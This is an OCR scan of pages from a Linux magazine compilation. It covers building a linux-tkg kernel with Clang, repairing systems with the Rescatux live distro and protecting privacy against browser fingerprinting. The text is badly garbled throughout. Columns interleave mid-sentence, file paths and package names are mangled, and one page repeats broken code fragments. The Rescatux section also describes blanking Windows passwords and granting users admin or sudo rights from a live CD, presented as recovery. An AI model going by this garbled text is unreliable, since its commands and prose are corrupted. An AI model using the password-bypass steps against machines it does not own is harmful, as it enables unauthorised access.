Zen 2 for modern Ryzen processors.
(Hl drtvers/nost/Host_core.o Linux-TKG (see https://github.com/Frogging-
drtvers/butlt-tn.a
drtvers/Uo/tnu/tnv_Rpu6050/tnv_
- Installation ["]
("I drtvers/tnftntband/hw/hftl/tntt. Family/linux-tkg) is included in Garuda Linux, but you
’ First steps [HI drtvers/tto/tnu/tnv_npu6050/tnv_
can try it out on any Arch-based distro. or any distro
► Customization
► Cheat sheet* /
£ [H]
[H]
(«]
drtvers/tnftntband/hw/bnxt_re/h*
drtvers/tto/tRu/tnv_Rpu6050/tnv_
drtvers/tnftntband/hw/hftl/tntr. with Arch's Pacman package manager installed. In
[H] drtvers/tnftntband/hw/bnxt_re/br
keybindings drtvers/tnftntband/hw/hftl/towat
[H]
(Ml drtvers/tto/tRu/tnv_Rpu6BSe/tnv_ theory it’ll work anywhere, but this isn't officially
» Gaming on drtvers/tnftntband/hw/hftl/tpott
(HJ
["] drtvers/tnftntband/hw/hftl/tpott sanctioned. Let’s try it. You’ll need to install Git and then
[H] drtvers/tto/tnu/tnv_npu60S0/tnv_
fetch the sources:

38 | The Hacker’s Manual


Build the Kernel
tools don’t ask to be included in the Linux titlage, and if
they did we would probably mock them.
If you choose Clang (see box, below), you can choose
jonni^pop-os: /mnt/heavy/tinux-S.1S.1S jonni<® pop-os: -
to enable Link Time Optimisations, but this will use a lot
of memory and take a long time.

Researching Clang
Using Clang requires (at least) the dang, llvm and lid
packages to be installed. And if you're on Ubuntu 20.04
you'll have to work around the older (version 10 series) in
the repos. DuckDuckGo is your friend here...
You’ll be asked several more questions, and some of
them have defaults which you should probably stick to at
first. Kernel Timer frequency has been the subject of
> Any excuse to feature a Pop!_OS background. They also some debate over the years, and TKG's default of 500Hz
make bespoke scheduler tweaks now seems to fit sensibly in the middle of the generic kernel
default of 250Hz, and the 1,000Hz setting currently used
$ sudo apt install git by some low-latency kernels. Finally you’ll be asked if you
$ git clone https://github.com/Frogging-Family/linux-tkg. want to run nconfig (or any of the other kernel
git configuration interfaces) for any final tweaks.
$ cd linux-tkg Once again now is a good time to make a cup of tea,
There’s a helpful installation script which we'll run in as kernel sources have to be cloned, patched and
a moment, but do read the documentation before doing configured. Any kernels generated this way must be
so. There’s also a config file customization.cfg that can removed manually, but the script can help with that. In
influence the script’s behaviour. Like make-kpkgthe general, any custom kernel you build as a DEB package
script will build DEB (or RPM if you’re using Fedora) should be easy to remove, but always keep an eye on
packages which can be installed like any other software. your /boot directory for ancient artefacts. We’d dearly
See how you get on with: love to cover more kernel patches, in particular Xanmod,
$ ,/install.sh install but it looks like we'll have to leave these explorations to
You'll be asked which distro you're using (there's a you. Do let us know how you get on!
generic option, but in general if you choose something
close to your distro it should work). Next you'll be asked
which kernel version you want to install. They’re listed Q Q clang orq

newest first, from the bleeding edge-RCs to the strong


lxf®4xf-SUnd*rd-PC-QJS-ICH»-2OO*-/llnux-tkq/l
and stable 5.4 series. We figured we'd go for a 5.16
version, because that seemed newer and shinier than
clang 3.5 is here... lxfjNxf-SUnd*rd-PC-QJS-ICH»-... (xf©>lxf-SUnd*rd-PC-Q JS-ICH9-...

IxfSlxMtandard - PC-Q35 - KM - x-tksAi


what we were currently running. You’ll then be offered a [sudo] password for Ixf:
... featuring C++14 support! Sorry, try again.
choice of CPU scheduler (we chose Project C/BMQ) [sudo] password for Ixf:
Reading package lists... Done
and given a choice of compiler. </> Get Started Building dependency tree
Reading state information... Done
The following additional packages will be installed:
■a
Downloads clang-10 llbclang-common-10-dev libclang-cpplO libclangl-1
Tools of the Linux trade ® C+*14/C++ly Status UbompS*10 llvm-10 llvn-10-dev Uvn-10-runtime Uvn-10-too
Suggested packages:
clang-10-doc libonp-10-doc Uvn* 10* doc
When Linux was announced in 1991 Linus noted that he
w Report a Bug The following NEW packages will be installed
clang clang-10 libclang-common-10-dev libclang-cpplO libel
had ported GNU Bash and GCCto work with it. He also libompS-10 Uvn-10 llvn-10-dev Uvn-10-runtime llvn-10-too
Get Involved
0 to upgrade, 12 to newly install, 0 to remove and S not to
noted these tools weren’t part of Linux proper, so as Need to get 70.0 MB of archives.
Planet Clang
After this operation, 439 MB of additional disk space will b
'distributions' started bundling GNU tools with the Linux Do you want to continue? [Y/n] |

Kernel, the GNU/Linux conjunction was born. Today’s


distributions still bundle lots of GNU tools (bash, emacs, > If you use Ubuntu 20.04 you’ll have to do some Apt magick to make
gcc), but also lots of other non-GNU tools. Those other Clang 3.5 work.

The Clang-ers
Some distros, such as Alpine and Android, language in which most of the kernel is Furthermore, a binary compiled with Clang
include very few GNU components (for written) as well as the GNU C extensions. can be investigated with advanced static and
example, muslibc and Bionic are used, There are technical reasons for using Clang dynamic analysis tools from the LLVM suite.
respectively, instead of the GNU C library). These can help find bugs. And yes. this means
as opposed to GCC. First, it makes
Most distros are still using GCC to compile compilation for different platforms easy. A that using Clangto compile the kernel can
their kernels, but for many years now it has result in a performance increase. As well as
binary compiled with Clang (m what's called
been possible to use the LLVM/Clang this, since Linux 5.12 (February 2021) the
the LLVM Intermediate Representation) can
compiler instead. Android and ChromeOS do kernel has supported LTO (link-time
target, after being processed by the
this, and so does OpenMandriva. LLVM (the optimisations) with Clang.
appropriate LLVM backend, multiple
Low Level Virtual Machine) is a toolchain This exercise enables the kernel to be
architectures. Currently, building the kernel is
based around C++ objects, and Clang is a optimised as a whole, instead of in the context
only supported for ARM and x86 targets, but
frontend to LLVM that supports C (the of individual source files.
others (MIPS. RISC-V, PowerPC) are available.

The Hacker's Manual | 39


Distros

Rescatux:
Repair & rescue
A one-stop lifebuoy to rescue your computer no matter if it’s
running Linux or Windows.
o many things can mess up your computer. A careless

S keypress can delete a file, rewrite the bootloader, mess


up the login password or cause other dreaded issues.
If you find yourself in a similar situation, stop panicking and
grab a hold of the Rescatux (http://www.supergrubdisk.
org/rescatux) distribution. The Live CD offers a rich
collection of tools that you can use to address a wide range of
problems in your Linux installation. Moreover Rescatux also
comes in handy if you dual-boot and can fix several common
issues with the Windows partitions as well.
The distribution bundles all the important and useful tools
to fix several issues with non-booting Linux and Windows,
including testdisk, photorec and GParted etc. You can use
Rescatux to restore MBR, repair bootloaders, correct
filesystem errors, fix partition tables and reset passwords on > Rescatux is there to help you recover from disasters, it
both Linux and Windows installs. It also packs in tools to also bundles utilities such as GPGV and shred to secure
Don't blank the rescue data and restore files and can even securely wipe both your system and prevent inadvertent privacy leaks.
password 'or an
Windows and Linux installs.
account that has
encrypted its data There are several rescue-oriented distributions but the minimal LXDE-powered graphical desktop. Here it
using the login Rescatux trumps them all because of its straightforwardness. automatically fires up its custom helper app called Rescapp.
password. Unlike other solutions that only offer a set of tools to fix your The application's interface has improved through the
broken computer. Rescatux employs a custom app that releases, and in its latest version it hosts several buttons
features categorised buttons to handhold you through the divided into various categories, such as Grub, Filesystem,
process of addressing specific problems. Boot and Password. The buttons inside each category have
The distribution is meant to be used as a Live medium, so descriptive labels that help identify their function. When you
transfer the ISO onto an optical disc or a removable USB click a button, it brings up the relevant documentation which
drive. Insert or connect the bootable Rescatux medium in the explains in detail what steps Rescatux will take and what
affected computer and boot from it. Rescatux will take you to information it expects from the user. After you’ve scrolled
through the illustrated documentation and know what to
expect, click the button labelled 'Run!' to launch the
respective utility.

Fsck things first


Although file systems have evolved quite a lot since the last
decade, sometimes all it takes to mess up the hard disk is a
misbehaving program that leaves you no option but to
forcibly restart the computer.
On restart, when your Linux distro detects an unclean
shutdown it automatically launches the fsck filesystem check
utility to verify the consistency of the file system. In many
situations, that should do the trick. But sometimes,
depending on factors such as the age of the disk and the file
system, and the task that was interrupted, an automatic
check wouldn't work.
In such a case your distribution will ask you to run the fsck
> Rescapp has several menus that lead to interfaces for command-line utilities tool manually. Although you can run fockfrom the
that employs a wizard to step through the various stages of the process. maintenance mode with your file system mounted as read-

40 | The Hacker's Manual


Rescatux

One-touch repair
Many issues with the Grub2 bootloader can be computers with the GPT layout. Boot-Repair is the tool also spits out a small URL which you
resolved with the touch of a button thanks to the available under the Expert Tools category in the should note. The URL contains a detailed
Boot-Repairapp. The nifty little app has an Rescapp utility. When you launch it. the app will summary of your disks, partitions along with the
intuitive user interface and can scan and scan your hard disk before displaying you its contents of important Grub 2 files including /
comprehend various kinds of disk layouts and simple interface that's made up of a couple of etc/default/grub and boot/grub/grub.cfg If
partitioning schemes and can sniff out and buttons. Most users can safely follow the tool's the tool hasn't been able to fix your bootloader,
correctly identify operating system installations advice and simply press the Recommended you can share the URL on your distro's forum
inside them. The utility works on both traditional repair button which should fix most broken boards to allow others to understand your disk
computers with MBR as well as the newer UEFI bootloader. After it’s restored your bootloader. layout and offer suggestions.

only, it's best to run feck from a Live CD without mounting the Security Account Manager (SAM) file. Usually it'll only list one
partition. To do this, boot Rescatux and select the File System partition, but if you have multiple Windows flavours, the
Check (Forced Fix) option. This will probe your computer and wizard will display multiple partitions. Select the one which
list all the partitions. Select the one that was spitting errors houses the user whose password you wish to recover. Use TestDiski
and Rescatux will scan and fix any inconsistencies. Rescatux will then backup the registry files before displaying Deeper Search
option toscan each
a list of users it finds on the partition you just selected. Select
cylinder and the
Boot camp the user whose password you wish to reset and Rescatux will superblocks to find
One of the most common issues that plagues Linux users is a wipe its password. You can then restart the computer, reboot missing partitions
botched up boot loader. It really doesn't take much effort to into Windows and login into the user you've just reset and if the default Quick
end up with an unbootable computer. The Master Boot Windows will let you in without prompting for a password. Search option isn't
able to unearth
Record (MBR) is located in a special area at the start of every Similarly, you can use the Promote Windows user to
them.
hard disk and helps keep track of the physical location of all Admin option to do exactly that. This option too will scan and
the partitions and also holds the bootloader. All it takes is a list all Windows partitions that house the SAM file. Select the
wrong key press in fdiskor gpartedcan wipe the MBR. one you’re interested it to view the list of users. Select a user
Rescatux includes several options to regenerate the GRUB from this list and Rescatux will tweak Windows to give it the
boot loader and fix the MBR. There's the Restore Grub option same privileges as an administrator. This mechanism works
which will first scan your computer for all partitions and read for all version of Windows including Windows 10 as well as
their identification information from the /etc/issue file. It'll long as they are secured by a password. However it will not
then display them in a list and ask you to select your main work if you've selected another mechanism to lock your
Linux distribution. Next it probes all the disks connected to account such as a PIN.
the computer and asks you to select the one on which you The newer version of Rescatux include the Easy Windows
wish to install GRUB. If you have multiple disks, the menu will Admin option. This option provides you the ability to take
prompt you to reorder them according to the boot order. back control of a Windows installation by combining multiple > Rescatux is

Once it has all this information, it'll use the grub-install options to first blank the user's password and then promote based on Debian
and includes the
command from the selected Linux distro and generate a new them to the Windows Administrator.
Synaptic package
boot loader and place it in the MBR. If you are using a Debian­ You can also use Rescatux to change passwords on a
manager that
based distribution such as Ubuntu, you can use the option Linux installation and regenerate a broken sudoersfile. Select
you can use
labelled Update GRUB Menus. It takes you through the same the Change Gnu/Linux Password option to allow Rescatux to for installing
wizards as the Restore Grub option but is optimised to help scan your computer for Linux installations. additional
you add Debian-based distributions to the GRUB bootloader. Then select the Linux partition you're interested in to view disaster
The newer releases of the distro also include the Ease a list of users on that particular installation. The root user is » recovery tools
GNU/Linux Boot fix option. It runs a combination of three
options. It starts off by forcing a filesystem check before
running the update grub option and ends with the restore
grub option. On the face of things, you'll still be asked only to
select the main Linux distro and the disk that should hold the
GRUB bootloader. Behind the scenes, this new option uses
the information for the three previously mentioned tasks.

Open sesame
We've all been there. Crafting an obscure password won't do
you any good if you can't remember it. Instead of endless
trying permutations and combinations to hit the jackpot, you
can instead use Rescatux to set yourself a new one without
much effort. The distribution offers password recovery
options for both Linux and Windows installations.
If you've forgotten the password for your Windows
installation, fire up Rescatux and select the Blank Windows
Password option from the Rescapp utility. The distribution
then scans your computer for partitions that contain the

The Hacker's Manual | 41


Distros
shown a list of lost partitions. Depending on the age of your
disk. TestDisk might display several partitions. To figure out
which is the correct partition that you want to recover, look
for the partition label listed at the end of each entry in
[square brackets]. If that doesn’t help you, press P on a
selected partition to see a list of files that TestDisk has found
on that partition. Repeat this with all partitions until you find
the right partition.
When you've found your partition, it's best to copy over
the data just in case TestDisk is unable to restore the
partition. To do so, press P and then use the a key to select all
files. Now press C to copy the files, which will ask you for the
location to save the files. When it's done copying press q to
return to the list of recovered partitions and press Enter to
continue to the next step to restore the selected partition.
TestDisk displays the partition structure again, this time with
> While the » at the top while the normal user accounts that you've created the missing partition accounted for. Now select Write to save
options in the during installation or manually afterwards are listed at the the partition table to the disk, and exit the program. If all goes
Rescatux menu bottom. Unlike resetting Windows password, when you well, when you reboot the computer, your partition will be
will help you select a Linux user, Rescatux gives you the option to define a restored back to where it should be.
fix the boot new password.
loader, in case
You get a similar wizard when you select the Regenerate Restore files
they don’t work
sudoers file option. It too searches for Linux installation and In addition to making unbootable computers boot again,
you can always
then displays a list of users in the selected distribution. Rescatux can also help you recover accidentally deleted files,
fall back on the
However instead of generating a password, this option will since you can't always blame data loss on a hardware failure.
Boot-Repair tool.
add the select user to the /etc/sudoers list which allows The Expert Tools category also includes the Photorec file
them to run apps with superuser permissions. carver utility that can recover files even when it's missing
regular metadata because instead of relying on the filesystem
Reclaim partitions it painstakingly scans the entire hard disk.
Sometimes the issues with your disk are much more severe When you delete a file, it isn't actually zapped into oblivion.
than a botched MBR and a corrupt boot loader. A power Rather the file system just marks it as deleted, and makes the
surge, a failing hard disk or a clumsy operator can all easily space the file occupies available to other files. This means
zap the partition table. TestDisk is the best tool that'll fix that until another app uses that recently freed-up space, the
partition tables and original file is still there, and
can be retrieved by a file
2“sXbXble 0 “Instead of relying on the recovery tool such as

can launch the tool


. I
filesystem
J
it painstakingly
t
Photorec. For this very
reason, it's very important
from under the [] scans the entire hard disk.” that you immediately stop
Expert section in the using the computer as
Rescapp utility. soon as you realise that you have accidentally deleted files in
When launched TestDisk first asks you to create a log order to minimise the interactions with the hard disk.
(which will come in handy for later analysis if the recovery The tool works on all sorts of disks including hard disks
fails) and then displays a list of all the disks attached to the and removable media such as USB disks. In addition to
computer. After you select the disk on which you've lost a reading unbootable disks, Photorec will also recover files from
partition, it’ll ask you to select a partition table type, such as partitions that have been formatted and reinstalled into.
Intel, Mac, Sun and so on. Photorec can sniff the most common image formats and can
Next, you are shown the various recovery options. Select additionally pick out files in various formats including odf, pdf.
the default Analyse option, which reads the partition structure 7zip, zip. tar, rpm, deb, and even virtual disks.
and hunts for lost partitions. It then displays the current Before you fire up Photorec. create a directory where it will
partition structure. Now select the Quick Search option to ask save the recovered files. Once the tool is done, this directory
TestDisk to look for deleted partitions. When it’s done, you're will be populated with lots of weirdly named files in different

When all else fails


While Rescatux will save your day Rescatux is a ferocious scribbler that houses all the logs that you either on the associated tool's
more often than not. it does have and creates a logfile for virtually all can peruse through to figure out forums or in its IRC channel. You
its limitations. If you've run through tasks. The Support section at the the exact reason for a task's failure. can also use the Chat option to
the tutorial and used the relevant top of the Rescapp utility lists the If you're unable to figure out the fire up xchat and log into the
Rescapp option but are still unable various options that comes in solution, you can use the Share log #rescatux IRC channel where
to recover from the failure, it is handy when you’re unable to option to copy the contents of a other users can help direct you to
time to defer to the wisdom of troubleshoot an issue yourself. The selected log file to pastebin. Copy the appropriate outlet to address
the elders. Show log options opens the folder the URL and share it with others your issue.

42 | The Hacker's Manual


Rescatux

OS Uninstaller

D Launch tool D Backup bootloader


Fire up the Rescapp utility and scroll down to the Expert Tools The app displays a list of operating systems and asks you to select
section. Click on the OS Uninstaller button to launch the tool. It'll the one you wish to uninstall. It also suggests you backup the
probe your disks and ask questions such as whether you use a RAID partition table and boot sector. Expand the Advanced options
setup on the disk. It ends when it detects a /boot directory on one of pulldown menu and click the Backup partition tables, bootsectors
the partitions on the disk. and logs option to point to the location for their safekeep.

EJ Uninstall the OS D Update the bootloader


The partition table and boot sector backups come in handy if in case Chances are you have other distributions or operating systems on
removing the OS damages these critical areas that you'll have to fix. this machine besides the one you've just uninstalled. Once you’ve
After backing these up along with any data, proceed with the OS removed an OS, you should make the bootloader aware of the change
uninstallation. The tool will remove all traces of the selected as well. To do this, use the Easy GNU/Linux Boot Fix option to refresh
distribution or OS. the boot loader.

formats. This is because Photorec names these files as it peek inside the destination folder, you'll see several folders
finds them and leaves the sorting to you. named recup_dir.l, recup_dir.2, and so on. The recovered
Also despite the fact that Photorec is a command-line files are saved under these folders. Manually sorting the files
utility, it breaks the process of recovering files into steps, would take forever. You could do some basic sorting from the Instead of wasting
much like a wizard. When you launch the tool, it will display all CLI to better organise the files. You can. for example, use the time sorting
hard disks and connected removable devices including any mv ~/recovered/recup_dir.7*.jpg ~/all-recovered-images to through all the
files recovered by
plugged-in USB drives. To proceed, select the disk with the move all the jpg files from under all the recovered folders into
PhotoRec you can
missing files. In case the disk houses multiple partitions, the all-recovered-images folder. ask the tool to only
Photorec will display all the partitions and lets you select the You can also sort files by their size, “his is very useful look for certain
one that housed the lost files. Next up. the tool needs to know especially when recovering images. In addition to recovering filetypes.
the file system type your files were stored in. It only presents the image itself. Photorec will also recover their thumbnails as
two options. Select the [ext2/ext3] option if the deleted file well which will have the same extension. The command
resided inside a Linux distro. The [Other] option will look for find ~/all-recovered-images/ -name “*.jpg” -size -10k I xargs
files created under FAT/NTFS/HFS+ or any other filesystem. -i mv {} -/thumbnails will move all images less than 10KB in
You’ll then have to decide whether you want to look for size out of the all-recovered-images folder.
deleted files only inside the freed up space or in the whole As you can see. Rescatux is an immensely useful
partition. The last step is to point Photorec to the folder distribution that can help you wiggle out of a tricky situation.
you've created to store all recovered files. While the heavy lifting is done by the powerful command-line
Armed with this info, Photorec will get to work and can open source tools and utilities, Rescatux makes them
take a while depending on the size of the partition. All the files accessible to inexperienced users thanks to its home-brewed
it finds are stored in the folder you pointed it to. When you menu-driven Rescapp utility. ■

The Hacker's Manual | 43


: 0) {S x{Si]: Secret jf$stari Sstai\ ], $screen->refi esh; usleer 00; gt ‘therub^
^^9 JSSF I I I fek
9 9 I I I
^^^^9 I H ^9^
9
^Kn^B^B I B^Hk

reen->addch($st^9Ji| HM 99
I ^1 W^B^I 19
I
99
^^^kwBB 9 --- ^^
I |^
^■B B^B BIB M ™„ nmn ^_
9 9 B B ^k 9 9
9 9 ^k
Sals IEbb W* B ^b^^L
BWbB 9 9 9 9
■ w 91 IJK E ^1 ■ gEELJ^S JS &i I
■M
I I
B ^B
I
WB MH
^BWWI B S’ ^B &
WB HI^R^B
aprocessable_entity} $ bw .9B9B9. ^9M^. _g|. ^_^j__ , ^g Emigrate $

^9

ite_attributes(params[:task]) format.html 9
9 9hhbBsk^W
| ^9 :o9
^HBi^b9Rlse
9 bbh^9b ^^B ^^9 format.html {render action: “edit”} formatjson {rei
sc rails generate migration add_priority_to_tasks priority.integer $ bundle exec rake db:migrate $ bundle exec rake db:migrate $ bundle exec rails server validate
at, ‘is in the past!’) if due_at < Time.zone.now #!/usr/bin/en python import pygame from random import randrange MAX.STARS = 100 pygame.init() screen = py
ars = for i in range(MAXJSTARS): star = [randrange(0,639), randrange(0,479), randrange(l, 16)] stars.append(star) while True: clock.tick(30) for event in pygame.
humstars = 100; use Time::HiRes gw(usleep); use Curses; Sscreen = new Curses; noecho; curs_set(0); for ($i = 0; Si < Snumstars ; $i++) {$star_x[$i] = rand(80); $s
clear; for ($i = 0; $i < Snumstars ; $i++) {$star_x[$i] -= $star_s[$i); if (Sstar_x($i] < 0) {$star_x[$i] = 80;} $screen->addch($star_y[$i], $star_x[$i], “.”);} $screen->refre
rent, lest do gem “rspec-rails”, “~> 2.13.0” S gem install bundler $ gem install rails -version=3.2.12 $ rbenv rehash $ rails new todolist --skip-test-unit respond
nl {redirect_to ©task, notice: *...’) formatjson {head :no_content) else format.html {render action: “edit”} formatjson {render json: @task.errors, status: :unprc
ity_to_tasks priority integer $ bundle exec rake db:migrate $ bundle exec rake db:migrate $ bundle exec rails server validate :due_at_is_in_the_past def due_at_is_
ine.now #!/usr/bin/en python import pygame from random import randrange MAX_STARS = 100 pygame.init() screen = pygame.display.set_mode((640, 480)) c
star = [randrange(0, 639), randrange(0, 479), randrange(l, 16)] stars.append(star) while True: clock.tick(30) for event in pygame.event.getQ: if event.type = pyg
tes qw(usleep); use Curses; $screen = new Curses; noecho; curs_set(0); for ($i = 0; Si < Snumstars ; $i++) {$star_x[$i] = rand(80); $star_y($i] - rand(24); $star_s[$i]
s ; $i++) { $star_x($i] -= $star_s[$i]; if ($star_x[$i] < 0) { $star_x($i] = 80;} $screen->addch($star_y[$i], $star_x{$i], “.”);} $screen->refresh; usleep 50000; gem “then
Is”, “~> 2.13.0” $ gem install bundler $ gem install rails -version=3.2.12 $ rbenv rehash $ rails new todolist -skip-test-unit respond_to do Iformatl if @task.update_
’} format.json {head :no_content} else format.html {render action: “edit”} format.json {render json: @task.errors, status: :unprocessable_entity} $ bundle exec rails
exec rake db:migrate $ bundle exec rake db:migrate $ bundle exec rails server validate :due_at_is_in_the_past def due_at_is_in_the_past errors.add(:due_at, ‘is in tf
rgame from random import randrange MAX_STARS = 100 pygame.init() screen = pygame.display.set_mode((640, 480)) clock = pygame.time.Clock() stars = :
3(0, 479), randrange(l, 16)] stars.append(star) while True: clock.tick(30) for event in pygame.event.get(): if event.type = pygame.QUIT: exit(O) #!/usr/bin/perl $nt
■ new Curses; noecho; curs_set(0); for ($i = 0; Si < Snumstars ; $i++) { $star_x($i] = rand(80); $star_y($i] = rand(24); $star_s[$i] - rand(4) + 1;} while (1) { $screen-
]; if ($star_x[$i] < 0) { $star_x($i] = 80;} $screen->addch($star_y[$i], $star_x[$i], “.”);} $screen->refresh; usleep 50000; gem “therubyracer”, “~> 0.11.4” group :de\
ndler $ gem install rails -version=3.2.12 $ rbenv rehash $ rails new todolist --skip-test-unit respond_to do Iformatl if @task.update_attributes(params[:task]) forma'
nt} else format.html {render action: “edit”} format.json {render json: @task.errors, status: :unprocessable_entity} $ bundle exec rails generate migration add_priori1
exec rake db'.migrate S bundle exec rails server validate :due_at_is_in_the_past def due_at_is_in_the_past errors.add(:due_at, ‘is in the past!’) if due_at < Time.zon
ndrange MAXJSTARS = 100 pygame.init() screen = pygame.display.set_mode((640, 480)) clock = pygame.time.Clock() stars = for i in range(MAX_STARS): star =
snd(star) while True: clock.tick(30) for event in pygame.event.get(): if event.type = pygame.QUIT: exit(O) #!/usr/bin/perl $numstars = 100; use Time::HiRes qw(us
($i = 0; $i < $numstars ; $i++) { $star_x($i] = rand(80); $star_y{$i] = rand(24); $star_s[$i] = rand(4) + 1;} while (1) { $screen->clear; for ($i = 0; $i < Snumstars ; $i++)
reen->addch($star_y(Si], $star_x[$i], “.”);} $screen->refresh; usleep 50000; gem “therubyracer”, “~> 0.11.4” group development, lest do gem “rspec-rails”, “~> 2.13.0
Security
The best defence is a good
offence, but also a good defence.
46 Protect your privacy
Discover what threats are out there and
what you can do to protect your devices.

54 Kali Linux
We take you inside the ultimate hacking
toolkit and explain how to use it in anger.

58 Secure chat clients


Chat online without anyone snooping in on
what you have to say.

64 Lock down Linux


We outline the essentials of locking down
your Linux boxes for secure networking.

68 Data recovery
Recover files from damaged disks and
ensure deleted items are gone for good.

72 Key management
Learn how to create a good GnuPG key
and keep it safe from online thieves.

>clear; for ($i = 0; $i < $numstars ; $i++) { $star_x[$i] -=


relopment, lest do gem “rspec-rails”, “~> 2.13.0” $ gem
t.html {redirect_to @task, notice: } format.json {head
y_to_tasks priorityanteger $ bundle exec rake dbrmigrate
e.now #!/usr/bin/en python import pygame from random
: [randrange(0, 639), randrangefO, 479), randrangefl, 16)]
sleep); use Curses; Sscreen = new Curses; noecho; curs_ The Hacker's Manual | 45
{$star_x[$i] -= $star_s[$i]; if ($star_x[$i] < 0) { $star_x[$i]
” $ gem install bundle: $ gem install rails -version=3.2.12
Prate.
orivac
In a world where the concept of online privacy is an
afterthought at best, David Rutland looks at the
hazards of the digital landscape and what you can
do to protect yourself. M
ew people like being tracked online. Sure, there are

F some legitimate reasons for it: you may be a threat


to national security - busily searching up
combustible materials, bidding for the infamous and
stylish Casio F-81W on eBay, or meeting up with your
fellow government-toppling anarchists on Facebook
(although no one is better at overthrowing HMG than
HMG). We’re sure there are warehouses full of counter­
terrorist officers sitting behind ancient CRT
monitors, watching the humdrum daily
activities of suspected terrorists as they scroll
through 60-second TikToks, work on mind-
numbing romance novels, and call their
grandmas on WhatsApp to make sure they've
remembe-ed to take their meds and have
enough milk. A James Bond lifestyle it ain't.
In reality most tracking takes place with
little or no human interaction, and is for ■
commercial purposes. Your data is sold, ■_.
rented or other otherwise surrendered for
Protect your privacy
cash. If you have a Google account and use Chrome, for
instance, everything you do online is synced across Reach
Google. If you use a Google handset, that data is tied to We value your privacy

your real-world activity, the locations you visit and the We and our partners store or access information on devices, such as cookies and process personal data, such as
unique identifiers and standard information sent by a device for the purposes described betaw. You may ckk to
contacts you call or text. consent to our and our partners’ processing for such purposes Alternatively, you may cbck to refuse to consent, or
access more detailed information and change your preferences before consenting Your preferences will apply to
In addition to the well-known perils of cookies and this website only. Please note that some processing of your personal data may not requwe your consent, but you
have a nghr to object to such processing You can :hange your preferences at any time by returning to this site or
beacons, which track you across internet, there are the visit our privacy policy.

browser fingerprinters that use nefarious methods to REJECT ALL ACCEPT ALL

pinpoint your device with alarming specificity.


Ditching Google and the Android mobile operating
system should be the first step you take to preserve
your online privacy. At the very least, you should be
using a privacy-respecting browser such as Brave or a
hardened Firefox, with ad-blockers and anti-tracking
plugins. Even better, Tor 12 alpha is out, making it easier
for you to bounce your traffic around the world.
T: W: ( 35% at 192.168.1.240) FULL 100.00% 570.1 G1B 0.81 6.2 Gi8 I 6.9 GiB 19-1
Fear not, because we’re here to bulk up your
defences and make it much more difficult for snoopers
and creeps to know what you're up to online. right to process this data if you grant consent or if the > Consenting
company has a legitimate interest. allows trackers
to strip-mine
Browser fingerprinting It’s because of this that you see irritating cookie
your browser for
Unless you’ve been living in a cave for the past 30 consent pop-ups almost everywhere you go on the
data, in addition
years, you’ll be aware of the role cookies play in helping web. A lot of websites have these, but some don’t.
to polluting
tracking companies to, erm, keep track of you. You may click Accept because you don’t care or your device with
These tiny files contain a unique identifier and can because you think that as you’re browsing in a private cookies. Don't
be inspected by the website that placed them - or window, cookies will be automatically wiped when do it!
occasionally by other websites and services. you close that window. You’re correct, but visit the
By itself, this isn’t necessarily a bad thing. Websites homepage of any ‘free’ online version of a major UK
that provide a login or shopping cart need to know that newspaper, and have a quick read through of the GDPR
you’re logged in and have recently added six kilos of consent pop-up. You’ll notice that it’s not just cookies
fertiliser and a couple of car batteries to your basket. you’re agreeing to.
But when cookies that can identify you across sites On the Daily Star’s website (currently showing a wet
are used, privacy becomes an issue; tracking networks lettuce), you’ll notice the consent notice is provided by
that control the cookies can tell precisely which sites a company called Reach, which also owns various
you’ve visited and what you did while you were there. Mirror Group titles. The second paragraph reads, “We
Our morning has involved scanning the headlines at and our partners may use precise geolocation data and
various news outlets, checking emails, comparing dog identification through device scanning.”
worming brands and perusing possible November This device scanning - also known as fingerprinting
getaways on caravan sites in north-west England. - takes a number of metrics to assign you a unique
We have no idea whether those sites have cookies identifier. These include IP address, system fonts
that can track across the web, but Firefox's default installed, OS, screen resolution, battery information,
setting is to block third-party cookies, and the searches time zone, canvas draw time and language settings.
were conducted in a private window, so this writer’s None of these attributes are unique on their own, but
anniversary plans are safe. Or are they? taken together, they identify exactly who you are, and
Taken together, the General Data Protection depending on the text of the consent form, you may be
Regulation (GDPR) and the ePrivacy Directive class allowing them to infer connections across devices, as
cookies as personal information because they can well. You don’t stay private and anonymous online by
help identify individuals, and companies only have a sitting there doing nothing - you have to be proactive.

How identifiable are you?


Browser fingerprinting works because machines using it. You’re further run for 30 seconds. We discovered that
very few computers are set up to be identified by the fact that you our personal laptop was completely
identical. Sure, in Linux Format Towers, (presumably) use Linux, making you unique, making it incredibly easy.
we sit in rows behind identical grey part of the elite 1% globally. If you’re One in 189 browsers has the same
boxes running the exact same OS, using one of the more esoteric distros WebGL Vendor and Renderer, one in 16
software, language packs and IP or DEs, you’re even more identifiable. has the same audio fingerprint, one in
address, but once we're home, the The Electronic Frontier Foundation four has the same number of CPU cores
situation is very different. developed Cover Your Tracks to help and one in nine runs on Linux x86_64.
The first giveaway is your IP address. you to discover exactly how unique you Those characteristics are shared by
Even if you live and work in a factory are, and how that can help ad corps to one in every 30,000 browsers, but it
dorm, that IP address isn’t going to track you without needing to use gets worse. Try it for yourself at:
have more than a couple of hundred cookies. Click a button and let the test https://coveryourtracks.eff.org.

The Hacker's Manual | 47


Security

The end of ad-blockers


Manifest V3 will cripple or kill ad-blockers for Chrome, Edge,
Opera and more. Why would Google do that?
d-blockers have been around
chrome web store $

A
it
for decades. They create a
much better reading Home > Extensions > uBlock Origin Lite

experience (shhh, TechRadar is


uBlock Origin Lite Available on Chrome
listening!—Ed) as you’re not constantly
★ ★ ★ ★ ★ 31 0 Productivity 8.000* trtora
bombarded by visual junk,
autoplaying videos and mysterious
sounds emanating from one of your Privacy practice* Support Related

72 open tabs.
Although it may appear
otherwise, adverts are not actually
on the site you visit in your browser.
The website provides a basic
HTML document that contains
instructions for formatting, locations
from which to retrieve images, and > UBlock Origin will struggle on with uBlock Origin Lite, which somehow still
how to fetch and display other manages to block ads while obeying the Google diktat. But for how long?
resources. Adverts are one such
resource and are pulled from a there’s no guarantee the maintainers won’t slip in some
remote location on kind of malware in future, or the project won’t be taken
the server of an advertising company. over by an evil villain. We’re not scaremongering, it
The URLs of these ad servers are generally well happens - most notably to the uBlock Origin fork Nano
known and have been compiled into dozens of lists Defender, which, after it was sold, incorporated a
that can be downloaded by you or your PC. forked connect.js file, which submitted user data and
When an ad-blocking extension is installed in a activity to remote servers. Extensions have also been
browser such as Google Chrome, resource requests used as trojans, viruses, keyloggers and other nasties.
are passed through the extension, which then retrieves Google’s big idea, first mooted in 2020, is part of its
